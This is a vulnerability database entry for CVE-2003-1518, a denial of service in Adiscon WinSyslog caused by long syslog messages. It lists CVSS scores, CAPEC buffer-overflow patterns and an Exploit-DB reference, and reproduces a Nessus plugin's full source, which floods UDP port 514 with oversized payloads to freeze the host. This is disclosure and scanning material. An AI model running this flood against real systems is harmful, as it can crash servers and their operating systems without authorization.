Vulnerabilities > CVE-2003-1518 - Buffer Errors vulnerability in Adiscon Winsyslog 4.21Sp1/5.0Beta

047910
CVSS 7.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
COMPLETE
network
low complexity
adiscon
CWE-119
nessus
exploit available

Summary

Adiscon WinSyslog 4.21 SP1 allows remote attackers to cause a denial of service (CPU consumption) via a long syslog message.

Vulnerable Configurations

Part Description Count
Application
Adiscon
2

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Client-side Injection-induced Buffer Overflow
    This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
  • Filter Failure through Buffer Overflow
    In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
  • MIME Conversion
    An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

Exploit-Db

descriptionWinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial Of Service Vulnerability. CVE-2003-1518 . Dos exploit for windows platform
idEDB-ID:23242
last seen2016-02-02
modified2003-10-14
published2003-10-14
reporter[email protected]
sourcehttps://www.exploit-db.com/download/23242/
titleWinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service Vulnerability

Nessus

NASL familyWindows
NASL idWINSYSLOG_DOS.NASL
descriptionThe remote host is running WinSyslog, an enhanced syslog server for Windows. A vulnerability in the product allows remote attackers to cause the WinSyslog to freeze, which in turn will also freeze the operating system on which the product executes.
last seen2020-06-01
modified2020-06-02
plugin id11884
published2003-10-15
reporterThis script is copyright (C) 2003-2018 Matthew North
sourcehttps://www.tenable.com/plugins/nessus/11884
titleWinSyslog Long Syslog Message Remote DoS
code
#
# WinSysLog DoS
# http://www.winsyslog.com
#

# Changes by Tenable:
# - Revised plugin title, family change (6/25/09)

include("compat.inc");

if (description)
{
  script_id(11884);
  script_version("1.23");
  script_cvs_date("Date: 2018/11/15 20:50:29");

  script_cve_id("CVE-2003-1518");
  script_bugtraq_id(8821);

  script_name(english:"WinSyslog Long Syslog Message Remote DoS");
  script_summary(english:"Attempts to crash the remote host");

  script_set_attribute(attribute:"synopsis", value:"The remote syslog service has a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running WinSyslog, an enhanced syslog server for
Windows. A vulnerability in the product allows remote attackers to
cause the WinSyslog to freeze, which in turn will also freeze the
operating system on which the product executes.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2003/Oct/1208");
  script_set_attribute(attribute:"solution", value:"Contact the vendor for a patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(119);

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/09/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/10/15");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DENIAL);	# ACT_FLOOD?
  script_copyright(english:"This script is copyright (C) 2003-2018 Matthew North");
  script_family(english:"Windows");

  script_dependencies('os_fingerprint.nasl');
  script_require_keys("Settings/ParanoidReport");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");

os = get_kb_item("Host/OS");
if ( os && "Windows" >!< os ) exit(0);

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = 514;
if (! get_udp_port_state(port)) exit(0, "UDP port "+port+" is not open.");
soc = open_sock_udp(port);
if(!soc) exit(1, "Could not open socket to UDP port "+port+".");
start_denial();

for(i=0; i < 1000; i++) {
                        num = (600+i)*4;
			bufc = string(crap(num));
                        buf = string("<00>", bufc);
	                send(socket:soc,data:buf);
            }

close(soc);
sleep(5);
alive = end_denial();
if(!alive)security_hole(port:514, proto:"udp");